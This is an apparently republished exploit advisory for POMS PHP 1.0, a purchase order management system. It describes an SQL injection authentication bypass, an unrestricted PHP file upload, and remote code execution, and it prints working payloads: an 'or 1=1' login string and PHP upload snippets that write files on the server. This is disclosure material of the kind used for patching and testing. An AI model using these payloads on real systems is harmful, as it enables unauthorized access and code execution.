Exploit/Advisories no image

Published on May 10th, 2024 📆 | 5297 Views ⚑

0

POMS PHP 1.0 SQL Injection / Shell Upload – Torchsec


iSpeech.org

## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK
1. SQLi Bypass Authentication
2. File Upload
3. RCE
## Latest update from the vendor: 5 hours 32 minutes ago
## Author: nu11secur1ty
## Date: 05/07/2024
## Vendor: https://github.com/oretnom23
## Software:
https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection,
https://portswigger.net/web-security/file-upload,
https://portswigger.net/web-security/authentication

## Description:
SQLi-Bypass-Authentication:
The username parameter is not sanitizing well, the attacker can bypass
authentication and login to the system.

---------------------------------------------------------------------------------------------------------------------------------------
FU:
Using this vulnerability, the attacker can upload any PHP file on the
server.
The parameter id="cimg" is not sanitizing securely.
STATUS: CRITICAL- Vulnerability

---------------------------------------------------------------------------------------------------------------------------------------
RCE:
The attacker can upload a malicious file with hazardous content. Then he
can use it to create another file on the server.
STATUS: CRITICAL- Vulnerability

[+]Exploits:
- SQLi bypass authentication:
```mysql
nu11secur1ty' or 1=1#
```

- FU:
```
phpinfo();
?>
```





- SQLi - Bypass-Authentication:
```
// by nu11secur1ty - 2023
$fh = fopen('test.html', 'a');
fwrite($fh, '

Hello, you are hacked by Fileupload and RCE!

');
fclose($fh);
//unlink('test.html');
?>
```

## Reproduce:
[href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653)

## Proof and Exploit:
[href](
https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html
)

## Time spent:
00:35:00

Source link

Tagged with:



Leave a Reply

Your email address will not be published.